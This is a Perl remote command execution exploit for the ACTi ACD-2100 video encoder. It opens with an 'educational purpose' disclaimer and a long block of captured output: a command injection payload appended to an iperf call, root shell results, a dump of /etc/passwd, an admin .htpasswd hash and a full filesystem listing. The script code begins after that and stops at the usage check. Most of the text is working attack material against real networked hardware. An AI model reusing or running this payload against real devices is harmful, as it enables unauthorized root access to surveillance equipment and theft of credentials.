Share
#!/usr/bin/perl
#
#  ACTi ACD-2100 Video Encoder Remote Command Execution Exploit
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#  Firmware Version = A1D-220-V3.08.08-AC
#  Production ID = ACD2100-08E-X-00498
#  Factory Default Type = NTSC, Composite, Two Ways Audio (0x71)
#  Company Name = ACTi Corporation
#  WEB Site = www.acti.com
#  Profile ID = ADV7180-RXX_V071030A
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!  
#  
#  (Dont do anything without permissions)
#
#  #  [ ACTi ACD-2100 Video Encoder Remote Command Execution Exploit
#  #  [ ============================================================
#  #  [ Exploit Author: Todor Donev 2019 <[email protected]>
#  #  [ Server: thttpd/2.25b 29dec2003
#  #  [ The target is vulnerable
#  #  [
#  #  [ Directory Traversal
#  #  [ http://192.168.1.1/cgi-bin/./
#  #  [ http://192.168.1.1/cgi-bin/../
#  #  [ http://192.168.1.1/cgi-bin/80503736
#  #  [ http://192.168.1.1/cgi-bin/cmd/
#  #  [ http://192.168.1.1/cgi-bin/encoder
#  #  [ http://192.168.1.1/cgi-bin/macdev
#  #  [ http://192.168.1.1/cgi-bin/mpeg4
#  #  [ http://192.168.1.1/cgi-bin/system
#  #  [ http://192.168.1.1/cgi-bin/test
#  #  [ http://192.168.1.1/cgi-bin/update
#  #  [ http://192.168.1.1/cgi-bin/updatem
#  #  [ http://192.168.1.1/cgi-bin/url.cgi
#  #  [ http://192.168.1.1/cgi-bin/videoconfiguration.cgi
#  #  [ http://192.168.1.1/cgi-bin/web1.cgi
#  #  [
#  #  [ Got root?
#  #  [ # id
#  #  [ execute : /sbin/iperf -c ;id &
#  #  [ uid=0(root) gid=0(root)
#  #  [ # cat /etc/passwd
#  #  [ execute : /sbin/iperf -c ;cat /etc/passwd &
#  #  [ root::0:0:root:/root:/bin/bash
#  #  [ bin:*:1:1:bin:/bin:
#  #  [ daemon:*:2:2:daemon:/usr/sbin:
#  #  [ sys:*:3:3:sys:/dev:
#  #  [ adm:*:4:4:adm:/var/adm:
#  #  [ lp:*:5:7:lp:/var/spool/lpd:
#  #  [ sync:*:6:8:sync:/bin:/bin/sync
#  #  [ shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown
#  #  [ halt:*:8:10:halt:/sbin:/sbin/halt
#  #  [ mail:*:9:11:mail:/var/spool/mail:
#  #  [ news:*:10:12:news:/var/spool/news:
#  #  [ uucp:*:11:13:uucp:/var/spool/uucp:
#  #  [ operator:*:12:0:operator:/root:
#  #  [ games:*:13:100:games:/usr/games:
#  #  [ ftp:*:15:14:ftp:/var/ftp:
#  #  [ man:*:16:100:man:/var/cache/man:
#  #  [ nobody:*:65534:65534:nobody:/home:/bin/sh
#  #  [ # ls -la /var/log
#  #  [ execute : /sbin/iperf -c ;ls -la /var/log &
#  #  [ -rw-r--r--    1 0        0             259 system_info_url.txt
#  #  [ -rw-r--r--    1 0        0             259 system_info_web.txt
#  #  [ -rw-r--r--    1 0        0              94 wan_info_brief.txt
#  #  [ -rw-r--r--    1 0        0             455 systemlog.txt
#  #  [ drwxr-xr-x    5 0        0            1024 ..
#  #  [ drwxr-xr-x    2 0        0            1024 .
#  #  [ # cat cmd/.htpasswd
#  #  [ execute : /sbin/iperf -c ;cat cmd/.htpasswd &
#  #  [ admin:rGtBkUV3A76PC
#  #  [ Admin:rGtBkUV3A76PC
#  #  [ # find / -type f 
#  #  [ execute : /sbin/iperf -c ;find / -type f &
#  #  [ /bin/busybox
#  #  [ /etc/fstab
#  #  [ /etc/thttpd/thttpd.conf
#  #  [ /etc/thttpd/thttpd.throttles
#  #  [ /etc/services
#  #  [ /etc/resolv.conf
#  #  [ /etc/profile
#  #  [ /etc/init.d/rcS
#  #  [ /etc/init.d/bootstrap
#  #  [ /etc/init.d/oem_load
#  #  [ /etc/init.d/system_load
#  #  [ /etc/init.d/thttpd
#  #  [ /etc/init.d/daemon_manager
#  #  [ /etc/init.d/modules
#  #  [ /etc/init.d/ddns
#  #  [ /etc/init.d/syslog
#  #  [ /etc/init.d/hostname
#  #  [ /etc/init.d/set_port_speed
#  #  [ /etc/init.d/get_wan_config
#  #  [ /etc/init.d/myserver
#  #  [ /etc/init.d/wan
#  #  [ /etc/init.d/datetime
#  #  [ /etc/init.d/dns
#  #  [ /etc/init.d/boot_sync
#  #  [ /etc/init.d/profile_load
#  #  [ /etc/init.d/datetime_rackmount
#  #  [ /etc/group
#  #  [ /etc/passwd
#  #  [ /etc/host.conf
#  #  [ /etc/inittab
#  #  [ /etc/ppp/plugins/rp-pppoe.so
#  #  [ /etc/ppp/resolv.conf
#  #  [ /etc/ppp/ip-down
#  #  [ /etc/ppp/ip-up
#  #  [ /etc/protocols
#  #  [ /etc/config/update.conf
#  #  [ /etc/default/default.conf
#  #  [ /etc/default/version
#  #  [ /etc/default/default.pppoe
#  #  [ /etc/default/build_date
#  #  [ /etc/default/global_options
#  #  [ /etc/default/boot_version
#  #  [ /etc/default/profile/camera.bin
#  #  [ /etc/default/profile/firmware.bin
#  #  [ /etc/default/profile/profile_id
#  #  [ /etc/default/profile/NameMap
#  #  [ /etc/default/profile/fw_cap.bin
#  #  [ /etc/default/model
#  #  [ /etc/default/fw_type
#  #  [ /etc/default/device
#  #  [ /etc/default/mac
#  #  [ /etc/default/serial
#  #  [ /etc/default/property
#  #  [ /etc/hosts
#  #  [ /lib/ld-uClibc-0.9.15.so
#  #  [ /lib/libcrypt-0.9.15.so
#  #  [ /lib/libdl-0.9.15.so
#  #  [ /lib/libm-0.9.15.so
#  #  [ /lib/libpthread-0.9.15.so
#  #  [ /lib/libresolv-0.9.15.so
#  #  [ /lib/libuClibc-0.9.15.so
#  #  [ /lib/libutil-0.9.15.so
#  #  [ /lib/modules/2.4.19-rmk4/acap_drv.o
#  #  [ /lib/modules/2.4.19-rmk4/ds1339_rtc.o
#  #  [ /lib/modules/2.4.19-rmk4/sound_drv.o
#  #  [ /proc/mtd
#  #  [ /proc/asoc2200_eth/DATA
#  #  [ /proc/misc
#  #  [ /proc/cpu/alignment
#  #  [ /proc/tty/drivers
#  #  [ /proc/tty/ldiscs
#  #  [ /proc/tty/driver/serial
#  #  [ /proc/sys/abi/fake_utsname
#  #  [ /proc/sys/abi/trace
#  #  [ /proc/sys/abi/defhandler_libcso
#  #  [ /proc/sys/abi/defhandler_lcall7
#  #  [ /proc/sys/abi/defhandler_elf
#  #  [ /proc/sys/abi/defhandler_coff
#  #  [ /proc/sys/fs/lease-break-time
#  #  [ /proc/sys/fs/dir-notify-enable
#  #  [ /proc/sys/fs/leases-enable
#  #  [ /proc/sys/fs/overflowgid
#  #  [ /proc/sys/fs/overflowuid
#  #  [ /proc/sys/fs/dentry-state
#  #  [ /proc/sys/fs/dquot-nr
#  #  [ /proc/sys/fs/file-max
#  #  [ /proc/sys/fs/file-nr
#  #  [ /proc/sys/fs/inode-state
#  #  [ /proc/sys/fs/inode-nr
#  #  [ /proc/sys/net/unix/max_dgram_qlen
#  #  [ /proc/sys/net/ipv4/conf/eth0/arp_filter
#  #  [ /proc/sys/net/ipv4/conf/eth0/tag
#  #  [ /proc/sys/net/ipv4/conf/eth0/log_martians
#  #  [ /proc/sys/net/ipv4/conf/eth0/bootp_relay
#  #  [ /proc/sys/net/ipv4/conf/eth0/medium_id
#  #  [ /proc/sys/net/ipv4/conf/eth0/proxy_arp
#  #  [ /proc/sys/net/ipv4/conf/eth0/accept_source_route
#  #  [ /proc/sys/net/ipv4/conf/eth0/send_redirects
#  #  [ /proc/sys/net/ipv4/conf/eth0/rp_filter
#  #  [ /proc/sys/net/ipv4/conf/eth0/shared_media
#  #  [ /proc/sys/net/ipv4/conf/eth0/secure_redirects
#  #  [ /proc/sys/net/ipv4/conf/eth0/accept_redirects
#  #  [ /proc/sys/net/ipv4/conf/eth0/mc_forwarding
#  #  [ /proc/sys/net/ipv4/conf/eth0/forwarding
#  #  [ /proc/sys/net/ipv4/conf/default/arp_filter
#  #  [ /proc/sys/net/ipv4/conf/default/tag
#  #  [ /proc/sys/net/ipv4/conf/default/log_martians
#  #  [ /proc/sys/net/ipv4/conf/default/bootp_relay
#  #  [ /proc/sys/net/ipv4/conf/default/medium_id
#  #  [ /proc/sys/net/ipv4/conf/default/proxy_arp
#  #  [ /proc/sys/net/ipv4/conf/default/accept_source_route
#  #  [ /proc/sys/net/ipv4/conf/default/send_redirects
#  #  [ /proc/sys/net/ipv4/conf/default/rp_filter
#  #  [ /proc/sys/net/ipv4/conf/default/shared_media
#  #  [ /proc/sys/net/ipv4/conf/default/secure_redirects
#  #  [ /proc/sys/net/ipv4/conf/default/accept_redirects
#  #  [ /proc/sys/net/ipv4/conf/default/mc_forwarding
#  #  [ /proc/sys/net/ipv4/conf/default/forwarding
#  #  [ /proc/sys/net/ipv4/conf/all/arp_filter
#  #  [ /proc/sys/net/ipv4/conf/all/tag
#  #  [ /proc/sys/net/ipv4/conf/all/log_martians
#  #  [ /proc/sys/net/ipv4/conf/all/bootp_relay
#  #  [ /proc/sys/net/ipv4/conf/all/medium_id
#  #  [ /proc/sys/net/ipv4/conf/all/proxy_arp
#  #  [ /proc/sys/net/ipv4/conf/all/accept_source_route
#  #  [ /proc/sys/net/ipv4/conf/all/send_redirects
#  #  [ /proc/sys/net/ipv4/conf/all/rp_filter
#  #  [ /proc/sys/net/ipv4/conf/all/shared_media
#  #  [ /proc/sys/net/ipv4/conf/all/secure_redirects
#  #  [ /proc/sys/net/ipv4/conf/all/accept_redirects
#  #  [ /proc/sys/net/ipv4/conf/all/mc_forwarding
#  #  [ /proc/sys/net/ipv4/conf/all/forwarding
#  #  [ /proc/sys/net/ipv4/neigh/eth0/locktime
#  #  [ /proc/sys/net/ipv4/neigh/eth0/proxy_delay
#  #  [ /proc/sys/net/ipv4/neigh/eth0/anycast_delay
#  #  [ /proc/sys/net/ipv4/neigh/eth0/proxy_qlen
#  #  [ /proc/sys/net/ipv4/neigh/eth0/unres_qlen
#  #  [ /proc/sys/net/ipv4/neigh/eth0/gc_stale_time
#  #  [ /proc/sys/net/ipv4/neigh/eth0/delay_first_probe_time
#  #  [ /proc/sys/net/ipv4/neigh/eth0/base_reachable_time
#  #  [ /proc/sys/net/ipv4/neigh/eth0/retrans_time
#  #  [ /proc/sys/net/ipv4/neigh/eth0/app_solicit
#  #  [ /proc/sys/net/ipv4/neigh/eth0/ucast_solicit
#  #  [ /proc/sys/net/ipv4/neigh/eth0/mcast_solicit
#  #  [ /proc/sys/net/ipv4/neigh/default/gc_thresh3
#  #  [ /proc/sys/net/ipv4/neigh/default/gc_thresh2
#  #  [ /proc/sys/net/ipv4/neigh/default/gc_thresh1
#  #  [ /proc/sys/net/ipv4/neigh/default/gc_interval
#  #  [ /proc/sys/net/ipv4/neigh/default/locktime
#  #  [ /proc/sys/net/ipv4/neigh/default/proxy_delay
#  #  [ /proc/sys/net/ipv4/neigh/default/anycast_delay
#  #  [ /proc/sys/net/ipv4/neigh/default/proxy_qlen
#  #  [ /proc/sys/net/ipv4/neigh/default/unres_qlen
#  #  [ /proc/sys/net/ipv4/neigh/default/gc_stale_time
#  #  [ /proc/sys/net/ipv4/neigh/default/delay_first_probe_time
#  #  [ /proc/sys/net/ipv4/neigh/default/base_reachable_time
#  #  [ /proc/sys/net/ipv4/neigh/default/retrans_time
#  #  [ /proc/sys/net/ipv4/neigh/default/app_solicit
#  #  [ /proc/sys/net/ipv4/neigh/default/ucast_solicit
#  #  [ /proc/sys/net/ipv4/neigh/default/mcast_solicit
#  #  [ /proc/sys/net/ipv4/tcp_tw_reuse
#  #  [ /proc/sys/net/ipv4/icmp_ratemask
#  #  [ /proc/sys/net/ipv4/icmp_ratelimit
#  #  [ /proc/sys/net/ipv4/tcp_adv_win_scale
#  #  [ /proc/sys/net/ipv4/tcp_app_win
#  #  [ /proc/sys/net/ipv4/tcp_rmem
#  #  [ /proc/sys/net/ipv4/tcp_wmem
#  #  [ /proc/sys/net/ipv4/tcp_mem
#  #  [ /proc/sys/net/ipv4/tcp_dsack
#  #  [ /proc/sys/net/ipv4/tcp_ecn
#  #  [ /proc/sys/net/ipv4/tcp_reordering
#  #  [ /proc/sys/net/ipv4/tcp_fack
#  #  [ /proc/sys/net/ipv4/tcp_orphan_retries
#  #  [ /proc/sys/net/ipv4/inet_peer_gc_maxtime
#  #  [ /proc/sys/net/ipv4/inet_peer_gc_mintime
#  #  [ /proc/sys/net/ipv4/inet_peer_maxttl
#  #  [ /proc/sys/net/ipv4/inet_peer_minttl
#  #  [ /proc/sys/net/ipv4/inet_peer_threshold
#  #  [ /proc/sys/net/ipv4/route/min_adv_mss
#  #  [ /proc/sys/net/ipv4/route/min_pmtu
#  #  [ /proc/sys/net/ipv4/route/mtu_expires
#  #  [ /proc/sys/net/ipv4/route/gc_elasticity
#  #  [ /proc/sys/net/ipv4/route/error_burst
#  #  [ /proc/sys/net/ipv4/route/error_cost
#  #  [ /proc/sys/net/ipv4/route/redirect_silence
#  #  [ /proc/sys/net/ipv4/route/redirect_number
#  #  [ /proc/sys/net/ipv4/route/redirect_load
#  #  [ /proc/sys/net/ipv4/route/gc_interval
#  #  [ /proc/sys/net/ipv4/route/gc_timeout
#  #  [ /proc/sys/net/ipv4/route/gc_min_interval
#  #  [ /proc/sys/net/ipv4/route/max_size
#  #  [ /proc/sys/net/ipv4/route/gc_thresh
#  #  [ /proc/sys/net/ipv4/route/max_delay
#  #  [ /proc/sys/net/ipv4/route/min_delay
#  #  [ /proc/sys/net/ipv4/route/flush
#  #  [ /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
#  #  [ /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
#  #  [ /proc/sys/net/ipv4/icmp_echo_ignore_all
#  #  [ /proc/sys/net/ipv4/ip_local_port_range
#  #  [ /proc/sys/net/ipv4/tcp_max_syn_backlog
#  #  [ /proc/sys/net/ipv4/tcp_rfc1337
#  #  [ /proc/sys/net/ipv4/tcp_stdurg
#  #  [ /proc/sys/net/ipv4/tcp_abort_on_overflow
#  #  [ /proc/sys/net/ipv4/tcp_tw_recycle
#  #  [ /proc/sys/net/ipv4/tcp_fin_timeout
#  #  [ /proc/sys/net/ipv4/tcp_retries2
#  #  [ /proc/sys/net/ipv4/tcp_retries1
#  #  [ /proc/sys/net/ipv4/tcp_keepalive_intvl
#  #  [ /proc/sys/net/ipv4/tcp_keepalive_probes
#  #  [ /proc/sys/net/ipv4/tcp_keepalive_time
#  #  [ /proc/sys/net/ipv4/ipfrag_time
#  #  [ /proc/sys/net/ipv4/ip_dynaddr
#  #  [ /proc/sys/net/ipv4/ipfrag_low_thresh
#  #  [ /proc/sys/net/ipv4/ipfrag_high_thresh
#  #  [ /proc/sys/net/ipv4/tcp_max_tw_buckets
#  #  [ /proc/sys/net/ipv4/tcp_max_orphans
#  #  [ /proc/sys/net/ipv4/tcp_synack_retries
#  #  [ /proc/sys/net/ipv4/tcp_syn_retries
#  #  [ /proc/sys/net/ipv4/ip_nonlocal_bind
#  #  [ /proc/sys/net/ipv4/ip_no_pmtu_disc
#  #  [ /proc/sys/net/ipv4/ip_autoconfig
#  #  [ /proc/sys/net/ipv4/ip_default_ttl
#  #  [ /proc/sys/net/ipv4/ip_forward
#  #  [ /proc/sys/net/ipv4/tcp_retrans_collapse
#  #  [ /proc/sys/net/ipv4/tcp_sack
#  #  [ /proc/sys/net/ipv4/tcp_window_scaling
#  #  [ /proc/sys/net/ipv4/tcp_timestamps
#  #  [ /proc/sys/net/core/hot_list_length
#  #  [ /proc/sys/net/core/optmem_max
#  #  [ /proc/sys/net/core/message_burst
#  #  [ /proc/sys/net/core/message_cost
#  #  [ /proc/sys/net/core/mod_cong
#  #  [ /proc/sys/net/core/lo_cong
#  #  [ /proc/sys/net/core/no_cong
#  #  [ /proc/sys/net/core/no_cong_thresh
#  #  [ /proc/sys/net/core/netdev_max_backlog
#  #  [ /proc/sys/net/core/rmem_default
#  #  [ /proc/sys/net/core/wmem_default
#  #  [ /proc/sys/net/core/rmem_max
#  #  [ /proc/sys/net/core/wmem_max
#  #  [ /proc/sys/vm/max_map_count
#  #  [ /proc/sys/vm/max-readahead
#  #  [ /proc/sys/vm/min-readahead
#  #  [ /proc/sys/vm/page-cluster
#  #  [ /proc/sys/vm/pagetable_cache
#  #  [ /proc/sys/vm/kswapd
#  #  [ /proc/sys/vm/overcommit_memory
#  #  [ /proc/sys/vm/bdflush
#  #  [ /proc/sys/kernel/overflowgid
#  #  [ /proc/sys/kernel/overflowuid
#  #  [ /proc/sys/kernel/random/uuid
#  #  [ /proc/sys/kernel/random/boot_id
#  #  [ /proc/sys/kernel/random/write_wakeup_threshold
#  #  [ /proc/sys/kernel/random/read_wakeup_threshold
#  #  [ /proc/sys/kernel/random/entropy_avail
#  #  [ /proc/sys/kernel/random/poolsize
#  #  [ /proc/sys/kernel/threads-max
#  #  [ /proc/sys/kernel/cad_pid
#  #  [ /proc/sys/kernel/sem
#  #  [ /proc/sys/kernel/msgmnb
#  #  [ /proc/sys/kernel/msgmni
#  #  [ /proc/sys/kernel/msgmax
#  #  [ /proc/sys/kernel/shmmni
#  #  [ /proc/sys/kernel/shmall
#  #  [ /proc/sys/kernel/shmmax
#  #  [ /proc/sys/kernel/rtsig-max
#  #  [ /proc/sys/kernel/rtsig-nr
#  #  [ /proc/sys/kernel/printk
#  #  [ /proc/sys/kernel/ctrl-alt-del
#  #  [ /proc/sys/kernel/real-root-dev
#  #  [ /proc/sys/kernel/cap-bound
#  #  [ /proc/sys/kernel/tainted
#  #  [ /proc/sys/kernel/core_uses_pid
#  #  [ /proc/sys/kernel/panic
#  #  [ /proc/sys/kernel/domainname
#  #  [ /proc/sys/kernel/hostname
#  #  [ /proc/sys/kernel/version
#  #  [ /proc/sys/kernel/osrelease
#  #  [ /proc/sys/kernel/ostype
#  #  [ /proc/sysvipc/shm
#  #  [ /proc/sysvipc/msg
#  #  [ /proc/sysvipc/sem
#  #  [ /proc/net/packet
#  #  [ /proc/net/unix
#  #  [ /proc/net/udp
#  #  [ /proc/net/tcp
#  #  [ /proc/net/sockstat
#  #  [ /proc/net/snmp
#  #  [ /proc/net/netstat
#  #  [ /proc/net/raw
#  #  [ /proc/net/rt_cache_stat
#  #  [ /proc/net/rt_cache
#  #  [ /proc/net/route
#  #  [ /proc/net/arp
#  #  [ /proc/net/netlink
#  #  [ /proc/net/pppoe
#  #  [ /proc/net/dev_mcast
#  #  [ /proc/net/softnet_stat
#  #  [ /proc/net/dev
#  #  [ /proc/kcore
#  #  [ /proc/ksyms
#  #  [ /proc/slabinfo
#  #  [ /proc/cpuinfo
#  #  [ /proc/kmsg
#  #  [ /proc/execdomains
#  #  [ /proc/iomem
#  #  [ /proc/swaps
#  #  [ /proc/locks
#  #  [ /proc/cmdline
#  #  [ /proc/ioports
#  #  [ /proc/filesystems
#  #  [ /proc/interrupts
#  #  [ /proc/partitions
#  #  [ /proc/devices
#  #  [ /proc/stat
#  #  [ /proc/modules
#  #  [ /proc/version
#  #  [ /proc/meminfo
#  #  [ /proc/uptime
#  #  [ /proc/loadavg
#  #  [ /proc/1/environ
#  #  [ /proc/1/status
#  #  [ /proc/1/cmdline
#  #  [ /proc/1/stat
#  #  [ /proc/1/statm
#  #  [ /proc/1/maps
#  #  [ /proc/1/mem
#  #  [ /proc/1/mounts
#  #  [ /proc/2/environ
#  #  [ /proc/2/status
#  #  [ /proc/2/cmdline
#  #  [ /proc/2/stat
#  #  [ /proc/2/statm
#  #  [ /proc/2/maps
#  #  [ /proc/2/mem
#  #  [ /proc/2/mounts
#  #  [ /proc/3/environ
#  #  [ /proc/3/status
#  #  [ /proc/3/cmdline
#  #  [ /proc/3/stat
#  #  [ /proc/3/statm
#  #  [ /proc/3/maps
#  #  [ /proc/3/mem
#  #  [ /proc/3/mounts
#  #  [ /proc/4/environ
#  #  [ /proc/4/status
#  #  [ /proc/4/cmdline
#  #  [ /proc/4/stat
#  #  [ /proc/4/statm
#  #  [ /proc/4/maps
#  #  [ /proc/4/mem
#  #  [ /proc/4/mounts
#  #  [ /proc/5/environ
#  #  [ /proc/5/status
#  #  [ /proc/5/cmdline
#  #  [ /proc/5/stat
#  #  [ /proc/5/statm
#  #  [ /proc/5/maps
#  #  [ /proc/5/mem
#  #  [ /proc/5/mounts
#  #  [ /proc/6/environ
#  #  [ /proc/6/status
#  #  [ /proc/6/cmdline
#  #  [ /proc/6/stat
#  #  [ /proc/6/statm
#  #  [ /proc/6/maps
#  #  [ /proc/6/mem
#  #  [ /proc/6/mounts
#  #  [ find: /proc/7/fd: No such file or directory
#  #  [ /proc/7/environ
#  #  [ /proc/7/status
#  #  [ /proc/7/cmdline
#  #  [ /proc/7/stat
#  #  [ /proc/7/statm
#  #  [ /proc/7/maps
#  #  [ /proc/7/mem
#  #  [ /proc/7/mounts
#  #  [ /proc/14/environ
#  #  [ /proc/14/status
#  #  [ /proc/14/cmdline
#  #  [ /proc/14/stat
#  #  [ /proc/14/statm
#  #  [ /proc/14/maps
#  #  [ /proc/14/mem
#  #  [ /proc/14/mounts
#  #  [ /proc/132/environ
#  #  [ /proc/132/status
#  #  [ /proc/132/cmdline
#  #  [ /proc/132/stat
#  #  [ /proc/132/statm
#  #  [ /proc/132/maps
#  #  [ /proc/132/mem
#  #  [ /proc/132/mounts
#  #  [ /proc/142/environ
#  #  [ /proc/142/status
#  #  [ /proc/142/cmdline
#  #  [ /proc/142/stat
#  #  [ /proc/142/statm
#  #  [ /proc/142/maps
#  #  [ /proc/142/mem
#  #  [ /proc/142/mounts
#  #  [ /proc/153/environ
#  #  [ /proc/153/status
#  #  [ /proc/153/cmdline
#  #  [ /proc/153/stat
#  #  [ /proc/153/statm
#  #  [ /proc/153/maps
#  #  [ /proc/153/mem
#  #  [ /proc/153/mounts
#  #  [ /proc/155/environ
#  #  [ /proc/155/status
#  #  [ /proc/155/cmdline
#  #  [ /proc/155/stat
#  #  [ /proc/155/statm
#  #  [ /proc/155/maps
#  #  [ /proc/155/mem
#  #  [ /proc/155/mounts
#  #  [ /proc/157/environ
#  #  [ /proc/157/status
#  #  [ /proc/157/cmdline
#  #  [ /proc/157/stat
#  #  [ /proc/157/statm
#  #  [ /proc/157/maps
#  #  [ /proc/157/mem
#  #  [ /proc/157/mounts
#  #  [ /proc/158/environ
#  #  [ /proc/158/status
#  #  [ /proc/158/cmdline
#  #  [ /proc/158/stat
#  #  [ /proc/158/statm
#  #  [ /proc/158/maps
#  #  [ /proc/158/mem
#  #  [ /proc/158/mounts
#  #  [ /proc/171/environ
#  #  [ /proc/171/status
#  #  [ /proc/171/cmdline
#  #  [ /proc/171/stat
#  #  [ /proc/171/statm
#  #  [ /proc/171/maps
#  #  [ /proc/171/mem
#  #  [ /proc/171/mounts
#  #  [ /proc/172/environ
#  #  [ /proc/172/status
#  #  [ /proc/172/cmdline
#  #  [ /proc/172/stat
#  #  [ /proc/172/statm
#  #  [ /proc/172/maps
#  #  [ /proc/172/mem
#  #  [ /proc/172/mounts
#  #  [ /proc/173/environ
#  #  [ /proc/173/status
#  #  [ /proc/173/cmdline
#  #  [ /proc/173/stat
#  #  [ /proc/173/statm
#  #  [ /proc/173/maps
#  #  [ /proc/173/mem
#  #  [ /proc/173/mounts
#  #  [ /proc/174/environ
#  #  [ /proc/174/status
#  #  [ /proc/174/cmdline
#  #  [ /proc/174/stat
#  #  [ /proc/174/statm
#  #  [ /proc/174/maps
#  #  [ /proc/174/mem
#  #  [ /proc/174/mounts
#  #  [ /proc/175/environ
#  #  [ /proc/175/status
#  #  [ /proc/175/cmdline
#  #  [ /proc/175/stat
#  #  [ /proc/175/statm
#  #  [ /proc/175/maps
#  #  [ /proc/175/mem
#  #  [ /proc/175/mounts
#  #  [ /proc/26407/environ
#  #  [ /proc/26407/status
#  #  [ /proc/26407/cmdline
#  #  [ /proc/26407/stat
#  #  [ /proc/26407/statm
#  #  [ /proc/26407/maps
#  #  [ /proc/26407/mem
#  #  [ /proc/26407/mounts
#  #  [ /proc/26410/environ
#  #  [ /proc/26410/status
#  #  [ /proc/26410/cmdline
#  #  [ /proc/26410/stat
#  #  [ /proc/26410/statm
#  #  [ /proc/26410/maps
#  #  [ /proc/26410/mem
#  #  [ /proc/26410/mounts
#  #  [ /sbin/dhcpcd
#  #  [ /sbin/ez-ipupdate
#  #  [ /sbin/htpasswd
#  #  [ /sbin/iperf
#  #  [ /sbin/thttpd
#  #  [ /usr/sbin/mount_nfs_drive
#  #  [ /usr/sbin/ll
#  #  [ /usr/sbin/system_info
#  #  [ /usr/sbin/read_dev_info
#  #  [ /usr/sbin/acti_config
#  #  [ /usr/sbin/show_progress
#  #  [ /usr/sbin/ddns_monitor
#  #  [ /usr/sbin/wan_status
#  #  [ /usr/sbin/adsl-connect
#  #  [ /usr/sbin/adsl-setup
#  #  [ /usr/sbin/acti_report
#  #  [ /usr/sbin/pppd
#  #  [ /usr/sbin/pppoe
#  #  [ /usr/sbin/acti_upgrade
#  #  [ /usr/sbin/thttpd_monitor
#  #  [ /usr/sbin/acti_485
#  #  [ /usr/sbin/dbg
#  #  [ /usr/sbin/ntpclient
#  #  [ /usr/sbin/acti_upgradem
#  #  [ /usr/sbin/dhcp_retry
#  #  [ /usr/sbin/pppoe_monitor
#  #  [ /usr/sbin/acti_reboot
#  #  [ /usr/sbin/acti_msg
#  #  [ /usr/sbin/mount_tmpfs
#  #  [ /usr/sbin/shell_relay
#  #  [ /usr/sbin/acti_logger
#  #  [ /usr/sbin/boot_ctrl
#  #  [ /usr/sbin/acti_gpio
#  #  [ /usr/sbin/acti_rs485
#  #  [ /usr/sbin/acti_rtc
#  #  [ /usr/sbin/acti_reg
#  #  [ /usr/sbin/conf_sync
#  #  [ /usr/sbin/conf_convert
#  #  [ /usr/sbin/bin2devinfo
#  #  [ /usr/sbin/audio_tester
#  #  [ /usr/sbin/bin2profile
#  #  [ /usr/sbin/acti-server
#  #  [ /usr/bin/setsid
#  #  [ /var/run/dev.bin
#  #  [ /var/run/system_type
#  #  [ /var/run/channel
#  #  [ /var/run/sys_conf.bin
#  #  [ /var/run/wan_state
#  #  [ /var/run/wanip_config
#  #  [ /var/run/encoder_run
#  #  [ /var/log/systemlog.txt
#  #  [ /var/log/wan_info_brief.txt
#  #  [ /var/log/system_info_web.txt
#  #  [ /var/log/system_info_url.txt
#  #  [ /var/www/images/Space.gif
#  #  [ /var/www/images/bar.gif
#  #  [ /var/www/images/bar2.gif
#  #  [ /var/www/images/icon.gif
#  #  [ /var/www/images/layout.gif
#  #  [ /var/www/images/r0-100.gif
#  #  [ /var/www/images/header_red.jpg
#  #  [ /var/www/images/ie_error.bmp
#  #  [ /var/www/images/r0-255.gif
#  #  [ /var/www/images/ptz_center_1.gif
#  #  [ /var/www/images/ptz_down_1.gif
#  #  [ /var/www/images/ptz_left_1.gif
#  #  [ /var/www/images/ptz_leftdown_1.gif
#  #  [ /var/www/images/ptz_leftup_1.gif
#  #  [ /var/www/images/ptz_right_1.gif
#  #  [ /var/www/images/ptz_rightdown_1.gif
#  #  [ /var/www/images/ptz_rightup_1.gif
#  #  [ /var/www/images/ptz_up_1.gif
#  #  [ /var/www/images/add.jpg
#  #  [ /var/www/images/delete.jpg
#  #  [ /var/www/images/focusin.jpg
#  #  [ /var/www/images/focusout.jpg
#  #  [ /var/www/images/home.jpg
#  #  [ /var/www/images/reset.jpg
#  #  [ /var/www/images/tele.jpg
#  #  [ /var/www/images/wide.jpg
#  #  [ /var/www/images/Num00.jpg
#  #  [ /var/www/images/Num01.jpg
#  #  [ /var/www/cgi-bin/cmd/system
#  #  [ /var/www/cgi-bin/cmd/mpeg4
#  #  [ /var/www/cgi-bin/cmd/encoder
#  #  [ /var/www/cgi-bin/cmd/.htpasswd
#  #  [ /var/www/cgi-bin/80503736
#  #  [ /var/www/cgi-bin/update
#  #  [ /var/www/cgi-bin/updatem
#  #  [ /var/www/cgi-bin/macdev
#  #  [ /var/www/cgi-bin/system
#  #  [ /var/www/cgi-bin/mpeg4
#  #  [ /var/www/cgi-bin/test
#  #  [ /var/www/cgi-bin/encoder
#  #  [ /var/www/cgi-bin/web1.cgi
#  #  [ /var/www/default.css
#  #  [ /var/www/index.htm
#  #  [ /var/www/profile/cze.bin
#  #  [ /var/www/profile/dan.bin
#  #  [ /var/www/profile/eng.bin
#  #  [ /var/www/profile/fin.bin
#  #  [ /var/www/profile/fre.bin
#  #  [ /var/www/profile/ger.bin
#  #  [ /var/www/profile/hun.bin
#  #  [ /var/www/profile/ita.bin
#  #  [ /var/www/profile/jap.bin
#  #  [ /var/www/profile/lang_table.bin
#  #  [ /var/www/profile/por.bin
#  #  [ /var/www/profile/sch.bin
#  #  [ /var/www/profile/spa.bin
#  #  [ /var/www/profile/tch.bin
#  #  [ /var/www/nvEPLMedia.ocx
#  #  [ /var/www/pid
#  #  [ #  
#  #  

use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTML::TreeBuilder;
$| = 1;

print "\033[2J";   #clear the screen
print "\033[0;0H"; #jump to 0,0

print "[ ACTi ACD-2100 Video Encoder Remote Command Execution Exploit
[ ============================================================
[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>
";

if(not defined $ARGV[0])
{
     print "[ Usage: perl $0 [target]\n";
